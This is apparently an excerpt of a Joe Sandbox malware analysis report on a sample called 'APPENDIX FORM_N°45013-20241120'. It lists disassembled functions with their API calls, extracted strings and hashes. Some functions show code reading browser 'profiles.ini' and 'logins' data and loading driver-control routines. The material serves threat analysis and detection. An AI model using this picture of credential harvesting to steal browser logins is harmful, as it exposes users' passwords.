                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                              • String ID:
                                                                                                              • API String ID: 829165378-0
                                                                                                              • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                              • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                              Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                                              • memset.MSVCRT ref: 00404200
                                                                                                              • memset.MSVCRT ref: 00404215
                                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                              • API String ID: 2454223109-1580313836
                                                                                                              • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                              • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                              Function 0041352F Relevance: 33.3, APIs: 9, Strings: 10, Instructions: 41libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+vw@Fvw@Bvw
                                                                                                              • API String ID: 667068680-772928780
                                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                              Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                              • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                              • API String ID: 4054529287-3175352466
                                                                                                              • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                              • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                              Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                              • API String ID: 3143752011-1996832678
                                                                                                              • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                              • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                              Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                              • API String ID: 1607361635-601624466
                                                                                                              • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                              • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                              Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                              • API String ID: 2000436516-3842416460
                                                                                                              • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                              • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                              Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1043902810-0
                                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                              Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                              • API String ID: 2899246560-1542517562
                                                                                                              • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                              • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                              Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                              • API String ID: 3330709923-517860148
                                                                                                              • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                              • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                              Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                              • memset.MSVCRT ref: 0040806A
                                                                                                              • memset.MSVCRT ref: 0040807F
                                                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                              • memset.MSVCRT ref: 004081E4
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                              • String ID: logins$null
                                                                                                              • API String ID: 2148543256-2163367763
                                                                                                              • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                              • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                              Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                                              • memset.MSVCRT ref: 00408606
                                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                                              • strcmp.MSVCRT ref: 0040876B
